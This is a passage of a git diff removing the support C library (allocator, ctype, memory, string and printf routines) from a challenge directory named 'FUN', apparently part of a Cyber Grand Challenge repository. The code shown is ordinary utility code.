NUM_ASCII_CHAR 128 -#define ASCII_MASK 0x7F - -// SPACE is first printable -#define SPACE 0x20 - -// DEL is only char after SPACE that is CNTRL -#define DEL 0x7F - -static const unsigned char _punct[NUM_ASCII_CHAR] = { - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, - 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, - 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0 -}; - -static const unsigned char _xdigit[NUM_ASCII_CHAR] = { - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, - 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 -}; - -int cgc_isalnum(int c) -{ - return cgc_isalpha(c) || cgc_isdigit(c); -} - -int cgc_isalpha(int c) -{ - return cgc_islower(c) || cgc_isupper(c); -} - -int cgc_isascii(int c) -{ - return !(c & ~ASCII_MASK); -} - -int cgc_isblank(int c) -{ - return (c == ' ' || c == '\t'); -} - -int cgc_iscntrl(int c) -{ - return c == DEL || c < SPACE; -} - -int cgc_isdigit(int c) -{ - return (unsigned int ) c - '0' < 10; -} - -int cgc_isgraph(int c) -{ - return c != ' ' && cgc_isprint(c); -} - -int cgc_islower(int c) -{ - return (unsigned int) c - 'a' < 26; -} - -int cgc_isprint(int c) -{ - return c >= SPACE && c != DEL; -} - -int cgc_ispunct(int c) -{ - return _punct[c]; -} - -int cgc_isspace(int c) -{ - return (c > 8 && c < 14) || c == ' '; -} - -int cgc_isupper(int c) -{ - return (unsigned int ) c - 'A' < 26; -} - -int cgc_isxdigit(int c) -{ - return _xdigit[c]; -} - -int cgc_toascii(int c) -{ - return c & ASCII_MASK; -} - -int cgc_tolower(int c) -{ - if (cgc_isupper(c)) - return c | SPACE; - - return c; -} - -int cgc_toupper(int c) -{ - if (cgc_islower(c)) - return c & (~SPACE & ASCII_MASK); - - return c; -} diff --git a/challenges/FUN/lib/free.c b/challenges/FUN/lib/free.c deleted file mode 100644 index bd3f781a7..000000000 --- a/challenges/FUN/lib/free.c +++ /dev/null @@ -1,51 +0,0 @@ -/* - * Author: Garrett Barboza - * - * Copyright (c) 2014 Kaprica Security, Inc. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - * - */ - -#include "libcgc.h" -#include "cgc_malloc.h" -#include "cgc_stdlib.h" - -static void free_huge(struct blk_t *blk) -{ - cgc_deallocate(blk, blk->size); -} - -void cgc_free(void *ptr) -{ - if (ptr == NULL) - return; - - struct blk_t *blk = (struct blk_t *)((intptr_t)ptr - HEADER_PADDING); - - if (blk->free != 0) - return; - - if (blk->size >= NEW_CHUNK_SIZE) { - free_huge(blk); - } else { - cgc_insert_into_flist(blk); - cgc_coalesce(blk); - } -} diff --git a/challenges/FUN/lib/malloc.c b/challenges/FUN/lib/malloc.c deleted file mode 100644 index edd8cb75e..000000000 --- a/challenges/FUN/lib/malloc.c +++ /dev/null @@ -1,143 +0,0 @@ -/* - * Author: Garrett Barboza - * - * Copyright (c) 2014 Kaprica Security, Inc. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - * - */ - -#include "libcgc.h" -#include "cgc_malloc.h" -#include "cgc_stdlib.h" - -/* Get some more memory through allocate */ -static int allocate_new_blk(void) -{ - void *ret; - struct blk_t *new_blk; - cgc_size_t size = NEW_CHUNK_SIZE; - - if (cgc_allocate(size, 0, &ret) != 0) { - return 1; - } - - if (ret == NULL) - return 1; - - new_blk = (struct blk_t *)ret; - new_blk->size = size; - new_blk->free = 1; - new_blk->fpred = NULL; - new_blk->fsucc = NULL; - new_blk->prev = NULL; - new_blk->next = NULL; - - cgc_insert_into_flist(new_blk); - return 0; -} - -/* Find first fit block for a size */ -static int find_fit(cgc_size_t size, struct blk_t **blk) -{ - int sc_i = cgc_get_size_class(size); - - for (; sc_i < NUM_FREE_LISTS; sc_i++) { - *blk = cgc_free_lists[sc_i]; - for(; *blk != NULL; *blk = (*blk)->fsucc) - if ((*blk)->size >= size) - return sc_i; - } - - *blk = NULL; - return -1; -} - -static void *malloc_huge(cgc_size_t size) -{ - void *mem; - size += HEADER_PADDING; - if (cgc_allocate(size, 0, &mem) != 0) - return NULL; - struct blk_t *blk = mem; - blk->size = size; - blk->free = 0; - blk->fpred = NULL; - blk->fsucc = NULL; - blk->prev = NULL; - blk->next = NULL; - return (void *)((intptr_t)blk + HEADER_PADDING); -} - -void *cgc_malloc(cgc_size_t size) -{ - if (size == 0) - return NULL; - - if (size + HEADER_PADDING >= NEW_CHUNK_SIZE) - return malloc_huge(size); - - if (size % ALIGNMENT != 0) - size = (size + ALIGNMENT - 1) & ~(ALIGNMENT - 1); - - if (size >= 0x80000000) - return NULL; - size += HEADER_PADDING; - - struct blk_t *blk = NULL; - int sc_i = find_fit(size, &blk); - - /* Allocate a new block if no fit */ - if (blk == NULL) { - if (allocate_new_blk() != 0) { - return NULL; - } else { - sc_i = NUM_FREE_LISTS - 1; - blk = cgc_free_lists[sc_i]; - } - } - - /* Remove the block we're going to use from the free list */ - cgc_remove_from_flist(blk); - - /* Split the block into two pieces if possible */ - cgc_size_t sdiff = blk->size - size; - if (sdiff > 2 * HEADER_PADDING) { - struct blk_t *nb = (struct blk_t *)((intptr_t)blk + size); - - nb->size = sdiff; - nb->free = 1; - nb->fsucc = NULL; - nb->fpred = NULL; - - blk->size = size; - - /* Patch up blk list pointers */ - nb->prev = blk; - nb->next = blk->next; - if (blk->next) - blk->next->prev = nb; - blk->next = nb; - - /* Put the new block into the free list */ - cgc_insert_into_flist(nb); - } - - return (void *)((intptr_t)blk + HEADER_PADDING); -} diff --git a/challenges/FUN/lib/malloc_common.c b/challenges/FUN/lib/malloc_common.c deleted file mode 100644 index 6fdfc7e6a..000000000 --- a/challenges/FUN/lib/malloc_common.c +++ /dev/null @@ -1,127 +0,0 @@ -/* - * Author: Garrett Barboza - * - * Copyright (c) 2014 Kaprica Security, Inc. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - * - */ - -#include "libcgc.h" -#include "cgc_malloc.h" -#include "cgc_stdlib.h" - -cgc_size_t size_class_limits[NUM_FREE_LISTS] = { - 2, 3, 4, 8, - 16, 24, 32, 48, - 64, 96, 128, 192, - 256, 384, 512, 768, - 1024, 1536, 2048, 3072, - 4096, 6144, 8192, 12288, - 16384, 24576, 32768, 49152, - 65536, 98304, 131072, INT32_MAX -}; - -struct blk_t *cgc_free_lists[NUM_FREE_LISTS] = {0}; - -static void remove_from_blist(struct blk_t *blk) -{ - if (blk->prev) - blk->prev->next = blk->next; - - if (blk->next) - blk->next->prev = blk->prev; -} - -int cgc_get_size_class(cgc_size_t size) -{ - int i; - for (i = 0; i < NUM_FREE_LISTS && size > size_class_limits[i]; i++); - return i; -} - - -void cgc_insert_into_flist(struct blk_t *blk) -{ - int sc_i = cgc_get_size_class(blk->size); - blk->free = 1; - - if (cgc_free_lists[sc_i] == NULL) { - cgc_free_lists[sc_i] = blk; - return; - } - - blk->fsucc = cgc_free_lists[sc_i]; - cgc_free_lists[sc_i]->fpred = blk; - cgc_free_lists[sc_i] = blk; - blk->fpred = NULL; -} - -void cgc_remove_from_flist(struct blk_t *blk) -{ - int sc_i = cgc_get_size_class(blk->size); - - if (blk->fpred) - blk->fpred->fsucc = blk->fsucc; - - if (blk->fsucc) - blk->fsucc->fpred = blk->fpred; - - if (cgc_free_lists[sc_i] == blk) - cgc_free_lists[sc_i] = blk->fsucc; - - blk->fsucc = NULL; - blk->fpred = NULL; - blk->free = 0; -} - -void cgc_coalesce(struct blk_t *blk) -{ - /* prev and next are free */ - if (blk->prev && blk->prev->free && blk->next && blk->next->free) { - cgc_remove_from_flist(blk->prev); - cgc_remove_from_flist(blk->next); - cgc_remove_from_flist(blk); - - blk->prev->size += blk->size; - blk->prev->size += blk->next->size; - cgc_insert_into_flist(blk->prev); - - remove_from_blist(blk->next); - remove_from_blist(blk); - /* Just prev is free */ - } else if (blk->prev && blk->prev->free && blk->next && !blk->next->free) { - cgc_remove_from_flist(blk->prev); - cgc_remove_from_flist(blk); - - blk->prev->size += blk->size; - cgc_insert_into_flist(blk->prev); - - remove_from_blist(blk); - /* Just next is free */ - } else if (blk->prev && !blk->prev->free && blk->next && blk->next->free) { - cgc_remove_from_flist(blk->next); - cgc_remove_from_flist(blk); - - blk->size += blk->next->size; - cgc_insert_into_flist(blk); - - remove_from_blist(blk->next); - } -} diff --git a/challenges/FUN/lib/memchr.c b/challenges/FUN/lib/memchr.c deleted file mode 100644 index 2764e25e1..000000000 --- a/challenges/FUN/lib/memchr.c +++ /dev/null @@ -1,39 +0,0 @@ -/* - * Author: Garrett Barboza - * - * Copyright (c) 2014 Kaprica Security, Inc. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - * - */ - -#include "libcgc.h" -#include "cgc_stdint.h" - -extern void *cgc_memchr(const void *s, int c, cgc_size_t n) -{ - cgc_size_t i = 0; - while (i < n) { - if (*((uint8_t *)s + i) == c) - return (void *)((intptr_t)s + i); - - i++; - } - return NULL; -} diff --git a/challenges/FUN/lib/memcmp.c b/challenges/FUN/lib/memcmp.c deleted file mode 100644 index f00e5802d..000000000 --- a/challenges/FUN/lib/memcmp.c +++ /dev/null @@ -1,36 +0,0 @@ -/* - * Author: Garrett Barboza - * - * Copyright (c) 2014 Kaprica Security, Inc. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - * - */ -#include "libcgc.h" - -int cgc_memcmp(const char *s1, const char *s2, cgc_size_t n) -{ - cgc_size_t i; - for(i = 0; i < n; i++) - if (*s1 != *s2) - return *s1 - *s2; - else - s1++, s2++; - return 0; -} diff --git a/challenges/FUN/lib/memcpy.c b/challenges/FUN/lib/memcpy.c deleted file mode 100755 index 3c311d6d4..000000000 --- a/challenges/FUN/lib/memcpy.c +++ /dev/null @@ -1,38 +0,0 @@ -/* - * Author: Garrett Barboza - * - * Copyright (c) 2014 Kaprica Security, Inc. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - * - */ - -#include "cgc_string.h" - -void *cgc_memcpy(void *dest, const void *src, cgc_size_t n) -{ - unsigned char *d = (unsigned char *)dest, *s = (unsigned char *)src; - cgc_size_t i = 0; - while (i < n) { - d[i] = s[i]; - i++; - } - - return dest; -} diff --git a/challenges/FUN/lib/memmove.c b/challenges/FUN/lib/memmove.c deleted file mode 100644 index ec0269ced..000000000 --- a/challenges/FUN/lib/memmove.c +++ /dev/null @@ -1,45 +0,0 @@ -/* - * Author: Andrew Wesie - * - * Copyright (c) 2014 Kaprica Security, Inc. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - * - */ -#include "cgc_string.h" - -void *cgc_memmove(void *dest, const void *src, cgc_size_t n) -{ - cgc_size_t i; - const unsigned char *usrc = src; - unsigned char *udest = dest; - - if (udest < usrc) - { - for (i = 0; i < n; i++) - udest[i] = usrc[i]; - } - else if (udest > usrc) - { - for (i = n; i > 0; i--) - udest[i-1] = usrc[i-1]; - } - - return dest; -} diff --git a/challenges/FUN/lib/memset.c b/challenges/FUN/lib/memset.c deleted file mode 100755 index 2c38b2a14..000000000 --- a/challenges/FUN/lib/memset.c +++ /dev/null @@ -1,42 +0,0 @@ -/* - * Author: Garrett Barboza - * - * Copyright (c) 2014 Kaprica Security, Inc. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - * - */ - -#include "libcgc.h" - -void *cgc_memset(void *s, int c, cgc_size_t n) -{ - if (s == NULL) - return NULL; - - if (n == 0) - return s; - - unsigned char *p = s; - cgc_size_t i; - for(i = 0; i < n; i++) - *p++ = (unsigned char) c; - - return s; -} diff --git a/challenges/FUN/lib/printf.c b/challenges/FUN/lib/printf.c deleted file mode 100644 index c9c88e557..000000000 --- a/challenges/FUN/lib/printf.c +++ /dev/null @@ -1,261 +0,0 @@ -/* - * Author: Andrew Wesie - * - * Copyright (c) 2014 Kaprica Security, Inc. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - * - */ -#include "cgc_stdlib.h" -#include "cgc_stdarg.h" -#include "cgc_string.h" - -#define OUTPUT_BYTE(x) do { \ - cgc_size_t bytes; \ - char _c = x; \ - cgc_transmit(fd, &_c, sizeof(_c), &bytes); \ -} while (0); - -#define NUM_TO_LOWER(x) (((x) < 10 ? (x)+'0' : (x)-10+'a')) -#define NUM_TO_UPPER(x) (((x) < 10 ? (x)+'0' : (x)-10+'A')) - -#define FLAG_PAD_ZERO 0x1 -#define FLAG_UPPERCASE 0x2 -int cgc_output_number_printf(int fd, unsigned int x, int base, int min, unsigned int flags) -{ - int n = 0; - if (x >= base) - { - n = cgc_output_number_printf(fd, x / base, base, min-1, flags); - x %= base; - } - if (n == 0 && min > 0) - { - while (--min) - if (flags & FLAG_PAD_ZERO) - OUTPUT_BYTE('0') - else - OUTPUT_BYTE(' ') - } - - if (flags & FLAG_UPPERCASE) - OUTPUT_BYTE(NUM_TO_UPPER(x)) - else - OUTPUT_BYTE(NUM_TO_LOWER(x)) - return n + 1; -} - -int cgc_fdprintf(int fd, const char *fmt, ...) -{ - char *astring; - char achar; - int aint, i, n = 0, flags = 0, min = 0; - unsigned int auint; - va_list ap; - va_start(ap, fmt); - - while (*fmt != '\0') - { - char c = *fmt++; - if (c == '%') - { - while (1) - { - c = *fmt++; - switch (c) - { - case '0': - flags |= FLAG_PAD_ZERO; - continue; - case '1': - case '2': - case '3': - case '4': - case '5': - case '6': - case '7': - case '8': - case '9': - min = cgc_strtol(fmt-1, (char**)&fmt, 10); - continue; - } - break; - } - switch (c) - { - case '%': - OUTPUT_BYTE('%') - break; - case 's': - astring = va_arg(ap, char *); - for (i = 0; i < cgc_strlen(astring); i++) - OUTPUT_BYTE(astring[i]); - break; - case 'd': - aint = va_arg(ap, int); - if (aint < 0) - { - OUTPUT_BYTE('-') - aint = -aint; - } - cgc_output_number_printf(fd, aint, 10, min, flags); - break; - case 'u': - auint = va_arg(ap, unsigned int); - cgc_output_number_printf(fd, auint, 10, min, flags); - break; - case 'X': - flags |= FLAG_UPPERCASE; - case 'x': - auint = va_arg(ap, unsigned int); - cgc_output_number_printf(fd, auint, 16, min, flags); - break; - case 'c': - achar = (signed char) va_arg(ap, int); - OUTPUT_BYTE(achar); - break; - default: - OUTPUT_BYTE(c) - break; - } - min = 0; - flags = 0; - } - else - { - OUTPUT_BYTE(c) - } - } - - va_end(ap); - return n; -} - -#undef OUTPUT_BYTE - -#define OUTPUT_BYTE(n, s, x) do { \ - cgc_size_t bytes; \ - char _c = x; \ - *(*(s)) = _c; \ - (*(s))++; \ - (*(n))++; \ -} while (0); - -int cgc_output_number_sprintf(int *n, char **s, unsigned int x, int base, int min, unsigned int flags) -{ - int m = 0; - if (x >= base) - { - m = cgc_output_number_sprintf(n, s, x / base, base, min-1, flags); - x %= base; - } - if (m == 0 && min > 0) - { - while (--min) - if (flags & FLAG_PAD_ZERO) - OUTPUT_BYTE(n, s, '0') - else - OUTPUT_BYTE(n, s, ' ') - } - - if (flags & FLAG_UPPERCASE) - OUTPUT_BYTE(n, s, NUM_TO_UPPER(x)) - else - OUTPUT_BYTE(n, s, NUM_TO_LOWER(x)) - return m + 1; -} - -int cgc_sprintf(char *str, const char *fmt, ...) -{ - char *astring; - int aint, i, n = 0, flags = 0, min = 0; - unsigned int auint; - va_list ap; - va_start(ap, fmt); - - while (*fmt != '\0') - { - char c = *fmt++; - if (c == '%') - { - while (1) - { - c = *fmt++; - switch (c) - { - case '0': - flags |= FLAG_PAD_ZERO; - continue; - case '1': - case '2': - case '3': - case '4': - case '5': - case '6': - case '7': - case '8': - case '9': - min = cgc_strtol(fmt-1, (char**)&fmt, 10); - continue; - } - break; - } - switch (c) - { - case '%': - OUTPUT_BYTE(&n, &str, '%') - break; - case 's': - astring = va_arg(ap, char *); - for (i = 0; i < cgc_strlen(astring); i++) - OUTPUT_BYTE(&n, &str, astring[i]); - break; - case 'd': - aint = va_arg(ap, int); - if (aint < 0) - { - OUTPUT_BYTE(&n, &str, '-') - aint = -aint; - } - cgc_output_number_sprintf(&n, &str, aint, 10, min, flags); - break; - case 'X': - flags |= FLAG_UPPERCASE; - case 'x': - auint = va_arg(ap, unsigned int); - cgc_output_number_sprintf(&n, &str, auint, 16, min, flags); - break; - default: - OUTPUT_BYTE(&n, &str, c) - break; - } - min = 0; - flags = 0; - } - else - { - OUTPUT_BYTE(&n, &str, c) - } - } - *str++ = 0; - - va_end(ap); - return n; -} - diff --git a/challenges/FUN/lib/realloc.c b/challenges/FUN/lib/realloc.c deleted file mode 100644 index 8ae2029b3..000000000 --- a/challenges/FUN/lib/realloc.c +++ /dev/null @@ -1,55 +0,0 @@ -/* - * Author: Garrett Barboza - * - * Copyright (c) 2014 Kaprica Security, Inc. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - * - */ - -#include "libcgc.h" -#include "cgc_malloc.h" -#include "cgc_stdlib.h" -#include "cgc_stdint.h" -#include "cgc_string.h" - -void *cgc_realloc(void *ptr, cgc_size_t size) -{ - if (ptr == NULL) - return cgc_malloc(size); - - if (size == 0) { - cgc_free(ptr); - return NULL; - } - - void *new = cgc_malloc(size); - if (new == NULL) - return NULL; - - struct blk_t *blk = (struct blk_t *)((intptr_t)ptr - HEADER_PADDING); - - if (size < blk->size - HEADER_PADDING) - cgc_memcpy(new, ptr, size); - else - cgc_memcpy(new, ptr, blk->size - HEADER_PADDING); - - cgc_free(ptr); - return new; -} diff --git a/challenges/FUN/lib/strcasecmp.c b/challenges/FUN/lib/strcasecmp.c deleted file mode 100644 index c4618b4f7..000000000 --- a/challenges/FUN/lib/strcasecmp.c +++ /dev/null @@ -1,39 +0,0 @@ -/* - * Author: Garrett Barboza - * - * Copyright (c) 2014 Kaprica Security, Inc. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - * - */ - -#include "cgc_ctype.h" - -int cgc_strcasecmp(const char *s1, const char *s2) -{ - unsigned char *_s1 = (unsigned char *)s1; - unsigned char *_s2 = (unsigned char *)s2; - while (*_s1 && *_s2) - if (!(*_s1 == *_s2 || cgc_tolower(*_s1) == cgc_tolower(*_s2))) - break; - else - _s1++, _s2++; - - return cgc_tolower(*_s1) - cgc_tolower(*_s2); -} diff --git 